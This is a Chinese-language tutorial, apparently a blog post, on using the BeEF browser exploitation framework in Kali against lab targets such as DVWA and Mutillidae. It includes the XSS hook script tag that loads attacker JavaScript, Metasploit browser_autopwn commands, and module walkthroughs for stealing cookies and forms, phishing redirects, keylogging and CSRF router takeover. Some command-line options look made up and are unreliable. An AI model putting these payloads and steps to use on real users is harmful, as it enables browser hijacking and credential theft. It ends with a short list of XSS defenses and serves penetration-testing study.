简介
BeEF(The Browser Exploitation Framework)是一款针对浏览器的渗tou测试工具。它集成了许多payload,可以实现多种功能,并支持API调用,用户可以编写自己的模块。在Kali Linux系统上,BeEF工具已经自动安装。
当我们打开BeEF时,会看到登录页面。该页面提供了两条信息:一条是BeEF的XSS引用地址,即本地IP的3000端口下的hook.js;另一条是BeEF的管理页面,即本地地址/ui/panel。
在当前Kali Linux系统上,BeEF已经开始监听3000端口。我们可以访问BeEF的管理页面,并使用默认的用户名和密码(beef)登录。
总结起来,BeEF是一款功能强大的浏览器渗tou测试工具,可以用于学习和交流目的。但请注意,严禁利用该工具进行非法行为,否则后果自负。
功能
信息收集
BEEF(Browser Exploitation Framework)是一个用于浏览器漏洞利用的框架,它可以用于信息收集、网络钓鱼、会话劫持等公鸡。下面是使用BEEF进行信息收集的步骤:
启动BEEF:在终端中切换到BEEF所在的目录,并运行以下命令启动BEEF:
cd /usr/share/beef-xss/
./beef
1.
2.
配置BEEF:在浏览器中访问http://localhost:3000/ui/panel,进入BEEF的控制面板。在控制面板中,你可以配置BEEF的各种设置,包括监听地址、端口、HTTPS证书等。
创建钓鱼页面:在BEEF的控制面板中,点击"Modules"选项卡,然后选择"Phishing"模块。在该模块中,你可以创建钓鱼页面,用于诱骗目标用户输入敏感信息。
发送钓鱼链接:将生成的钓鱼页面链接发送给目标用户,诱使其点击并输入敏感信息。
收集信息:一旦目标用户点击了钓鱼链接并输入了敏感信息,BEEF将会收集到这些信息,并在控制面板中显示。
请注意,使用BEEF进行信息收集等活动可能涉及到违法行为,且可能对他人造成损害。请确保你在合法授权的范围内使用BEEF,并遵守相关法律法规。
持久化控制
BEEF(Browser Exploitation Framework)是一个用于公鸡浏览器的框架,它可以帮助公鸡者获取对受害者浏览器的控制权。在获得对僵尸浏览器的初始化控制后,持久化控制是非常重要的,以便为后续的公鸡提供更多时间。
持久化控制主要包括两个方面:持久通信和持久存续。
持久通信:持久通信是指BeEF服务器和僵尸浏览器之间的通信技术选择。高级的通信技术可以提供更快的速度。BeEF使用各种通信技术,如AJAX、WebSockets和长轮询等,来确保与僵尸浏览器之间的持久通信。
持久存续:持久存续是指让用户尽可能地停留在具有BeEF勾子的页面上。这可以通过多种方式实现,例如:
诱使用户点击链接或按钮,以防止页面跳转到新页面。
使用JavaScript代码来阻止页面关闭事件,以便用户无法关闭页面。
使用各种技术(如IFrame、弹出窗口等)来打开新的浏览器窗口,以便用户保持在具有BeEF勾子的页面上。
需要注意的是,持久化控制也有一些限制和缺点。例如,无法加载图片和某些特定的页面操作(如点击导航菜单中的链接)可能导致页面跳转,从而失去对浏览器的控制权
社会工程
BeEF(Browser Exploitation Framework)是一个强大的开源渗tou测试框架,它可以用于进行社会工程公鸡。通过BeEF,公鸡者可以利用浏览器漏洞来获取目标用户的浏览器信息、键盘记录等敏感信息。
下面是一个使用BeEF进行社会工程公鸡的示例:
首先,你需要安装和配置BeEF。你可以从官方网站(http://beefproject.com)下载BeEF,并按照官方文档进行安装和配置。
一旦安装和配置完成,你可以启动BeEF服务。
接下来,你需要获取目标用户的浏览器连接。你可以通过发送钓鱼邮件、社交媒体欺骗等方式来引诱目标用户点击恶意链接。
当目标用户点击恶意链接并访问了你的BeEF服务器时,你将能够在BeEF控制台中看到目标用户的浏览器连接。
一旦你获得了目标用户的浏览器连接,你可以利用BeEF的各种模块进行社会工程公鸡
。例如,你可以使用键盘记录模块来记录目标用户的键盘输入,者使用浏览器信息模块来获取目标用户的浏览器版本和操作系统信息。
需要注意的是,进行社会工程公鸡是违法行为,重侵犯了他人的隐私和安全。请确保你在合法的环境中使用BeEF,并遵守相关法律法规。
BEEF(The Browser Exploitation Framework)是一个专注于利用浏览器漏洞的Web框架公鸡平台。它可以用于合法的研究和测试目的。通过BEEF,公鸡者可以利用浏览器漏洞来获取目标主机的用户名和密码,甚至可以获取目标主机的shell访问权限。
BEEF的使用方法如下:
首先,你需要安装和配置BEEF。你可以从BEEF的官方网站(https://beefproject.com/)下载最新版本的BEEF,并按照官方文档进行安装和配置。
安装和配置完成后,你可以启动BEEF。在启动BEEF之后,它将监听一个特定的端口(默认为3000)。
接下来,你需要诱使目标用户访问你的恶意网站。你可以通过发送钓鱼邮件、社交工程等方式来引诱目标用户点击你的恶意链接。
当目标用户访问你的恶意网站时,BEEF将会自动检测目标用户的浏览器漏洞,并尝试利用这些漏洞。
如果成功利用了浏览器漏洞,BEEF将会建立一个与目标用户浏览器的连接,并提供一系列公鸡
模块和功能,包括获取目标主机的用户名和密码,以及获取目标主机的shell访问权限。
需要注意的是,BEEF是一个强大的工具,但在使用时必须遵守法律和道德规范。只能在合法的研究和测试目的下使用,不得用于非法活动。
基础使用
启动服务
图形启动
点击Kali Linux BeEF图标
这里还是需要手工启动Apache服务
故障解决
命令启动
root@kali:~# service apache2 start
root@kali:~# cd /usr/share/beef-xss/
root@kali:/usr/share/beef-xss# ./beef
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browseronce it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src=" http://127.0.0.1:3000/hook.js"></script>
Hook脚本
<script src="172.16.70.216:3000/hook.js"></script>
这里的IP地址172.16.70.216即启动了BeEF的主机
登录BeEF
账号密码beef/beef
检查脚本
渗tou机器上访问"本机地址:3000/hook.js",保证 能看到公鸡脚本
靶机测试
环境地址说明
将脚本放在Mutillidae靶机中
说明
在chrome下执行这段脚本,会出现安全拦截报错,建议用ie或者firefox
<script src="172.16.70.216:3000/hook.js"></script>
将脚本放在DWVA靶机中
由于这个页面存在字数限制,所以需要修改前端代码
例如Firebug来修改
在Windows 7访问此XSS页面
访问之后上去也没有任何异常,但此时的脚本其实已经运行了
除了WIN7访问这个页面,Kali 自己刷新页面,也会自己上钩
说明
IE不行的话,再用Chrome访问
在BeEF页面,可以看到肉鸡上线
只要肉鸡浏览器不关闭,这里就可以一直控制它
整个过程,对于肉鸡来说,没有发现有任何问题
服务管理
命令帮助
BeEF是一个用于浏览器漏洞利用的框架,它可以帮助安全研究人员测试和演示各种Web浏览器的安全漏洞。下面是一些常用的BeEF命令和其功能:
beef-xss: 启动BeEF框架。
beef: 启动BeEF控制台。
beef -h 或 beef --help: 显示BeEF命令的帮助信息。
beef -v 或 beef --version: 显示BeEF框架的版本信息。
beef -c <config_file>: 使用指定的配置文件启动BeEF框架。
beef -p <port>: 指定BeEF框架监听的端口号。
beef -s: 启动BeEF框架并在后台运行。
beef -x <command>: 执行指定的BeEF命令。
你可以使用上述命令来启动BeEF框架、控制台以及执行其他相关操作。更多关于BeEF框架的详细信息和使用方法,你可以参考BeEF框架的官方文档: https://github.com/beefproject/beef/wiki。
开启服务
以下是开启BeEF服务的步骤:
首先,确保已经安装了BeEF。如果还没有安装,请按照官方文档或相关教程进行安装。
打开终端,并输入以下命令来启动Apache服务:
sudo service apache2 start
确保Apache服务已经成功启动后,再输入以下命令来启动BeEF:
sudo beef-xss
当看到类似于以下信息时,表示BeEF服务已经成功启动:
复制
[INFO] BeEF is running at: http://127.0.0.1:3000/ui/panel
请注意,BeEF默认监听在本地的3000端口。您可以在浏览器中访问上述URL来打开BeEF的控制面板。
重置数据库
如果您想要重置数据库,可以使用MySQL的命令行工具或者图形化界面工具来执行相应的操作。以下是使用MySQL命令行工具重置数据库的步骤:
打开命令行终端或者命令提示符。
使用以下命令登录到MySQL数据库:
mysql -u 用户名 -p
其中,用户名是您的MySQL数据库用户名。执行该命令后,系统会提示您输入密码。
输入密码后,按回车键登录到MySQL数据库。
使用以下命令选择要重置的数据库:
USE 数据库名;
其中,数据库名是您要重置的数据库的名称。
使用以下命令删除数据库中的所有表:
DROP TABLE 表名1, 表名2, ...;
其中,表名1, 表名2, …是您要删除的表的名称。如果要删除所有表,可以使用以下命令:
SHOW TABLES;
该命令会显示数据库中的所有表,然后您可以逐个删除这些表。
重置数据库完成后,您可以重新创建表和插入数据。
请注意,重置数据库将删除数据库中的所有表和数据,因此请谨慎操作并确保您已经备份了重要的数据。
关闭服务
root@kali:~# service apache2 stop
root@kali:/usr/share/beef-xss# service beefxss stop
使用方法
信息收集
目标详情(Detail)
以前抓肉鸡,需要各种灰鸽子、冰河木目马等后门 程序,配合系统漏洞来实现
现在仅需要一个链接,就可以批量抓肉鸡,而随着社交网络、云计算机、Web应用的发展
越来越多基于Web/浏览器的公鸡技术会出现,配合社会工程师和蠕虫,完全可以实现大规模的网 络公鸡
命令颜色(Color)
绿色 对目标主机生效并且不可见(不会被发现)
橙色 对目标主机生效但可能可见(可能被发现)
灰色 对目标主机未必生效(可验证下)
红色 对目标主机不生效
浏览器(Brower)
检测信息(detect)
检测浏览器类型
检测是否有firebug插件
检测是否有Foxit Reader插件
检测是否可以访问某个URL
检测是否允许访问摄像头
获取信息(get)
获取cookie信息
获取表单信息
获取HTML
获取HREF 此页面的URL链接
修改信息(replace)
修改链接
修改视频
创建信息(create)
警告框create alert Dialog
对话框create prompt dialog
重定向(redirect)
重定向到目标网站
目标网站可以设置为一个伪装的支付宝/网银/网游登录页面
重定向并处于加载状态
实际上已经重定向到另外的网站了,但是为了伪 装,让页面处于加载状态
重定向到iframe页面
实际上已经重定向到另外的网站了,但是为了伪 装,通过iframe页面将页面处于空白状态
其他功能
主机(Host)
获取内部地址
检测是否在虚拟机里
hook其他浏览器
网络(Network)
端口扫描
PING扫描
DOS公鸡
插件(Chrome Extensions)
持久化控制
中间人公鸡
用户点击其他链接,浏览器不跳,保留在原来页面
关闭确认弹框
小窗口
漏洞利用
本地主机(local host)
基于ms漏洞拿shell
win xp下测试
win7下测试
基于ms漏洞获取shell的方法有很多种,具体的方法取决于具体的漏洞类型和系统环境。以下是一种常见的基于ms漏洞获取shell的方法:
首先,你需要找到一个已知的ms漏洞,可以通过漏洞扫描工具或者漏洞数据库来查找。
一旦找到了目标漏洞,你需要了解该漏洞的利用方式和公鸡
方法。这通常需要对漏洞进行深入研究,包括查找已有的漏洞利用脚本或工具。
接下来,你需要准备一个公鸡
环境,包括安装必要的工具和软件。这可能包括渗头测试工具、代理服务器、漏洞利用框架等。
一旦准备好公鸡
环境,你可以开始执行漏洞利用。这可能涉及到发送特制的恶意请求、利用系统漏洞、绕过安全措施等。
如果漏洞利用成功,你将能够获取对目标系统的访问权限。这可能包括获取shell访问权限、提升权限、获取管理员权限等。
需要注意的是,进行任何形式的公鸡都是非法的,除非你有合法的授权和目的。在进行任何安全测试或渗头测试之前,请确保你已经获得了合法的授权,并且只在合法的环境中进行测试。
摄像头(Camera)
简介
基于CSRF(跨站伪造请求),修改网络摄像机的管理密码
路由器(Router)
简介
基于CSRF(跨站伪造请求),假设目标用户已经登录了路由器,则可以执行以下功能
修改登录密码、关闭防火墙、开启远程管理(80/23)
修改DNS服务器、重启路由器
支持cisco、3com、huawei、TP-link等路由器
交换机(Switch)
功能同路由器渗头模块类似
Metasploit
Metasploit设置
使用浏览器载荷,开启监听端口,等待肉鸡访问
Kali 的MSF需要解决数据库问题
update-rc.d postgresql enable 开启启动
service postgresql start 启动数据库
service metasploit start 启动msf
msfupdate 更新msf
msfconsole 进行msf
msf > db_status 检测数据库连接
apt-get install metasploit-framework 更新msf
针对winxp和2003成功几率大
操作
MSF操作
msfconsole 进入MSF
search browser
_
autopwn 搜索浏览器模块
use auxiliary/server/browser
_
autopwn 使用模块
show options 查看配置信息
set LHOST 172.16.70.216
设置本机IP
set SRVHOST 172.16.70.216
set URIPATH / 设置后缀信息
exploit
执行截图
BeEF设置
说明 让肉鸡访问Metasploit的监听地址
社会工程公鸡 Social Engineering
点击劫持
clickjacking
谷歌钓鱼
Facebook钓鱼
虚假更新
其他功能
Rider
Forge Request
GET / HTTP/1.1
Host: bing.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Connection: close
xss防御
1、Web客户端和服务端脚本对用户输入输出字符进行安全过滤和转义
<
>
script
htmlspecialchars
2、Web服务器安装WAF/IDS/IPS等安全产品,拦截公鸡代码
3、浏览器设置为高安全级别,Cookie属性HttpOnly设置为true,防止被JS调用
浏览器将禁止页面的Javascript访问带有HttpOnly属性的Cookie
4、关闭浏览器自动密码填写功能,防止被钓鱼页面/表单调取账号密码
可选
方便了用户,也让用户更加的危险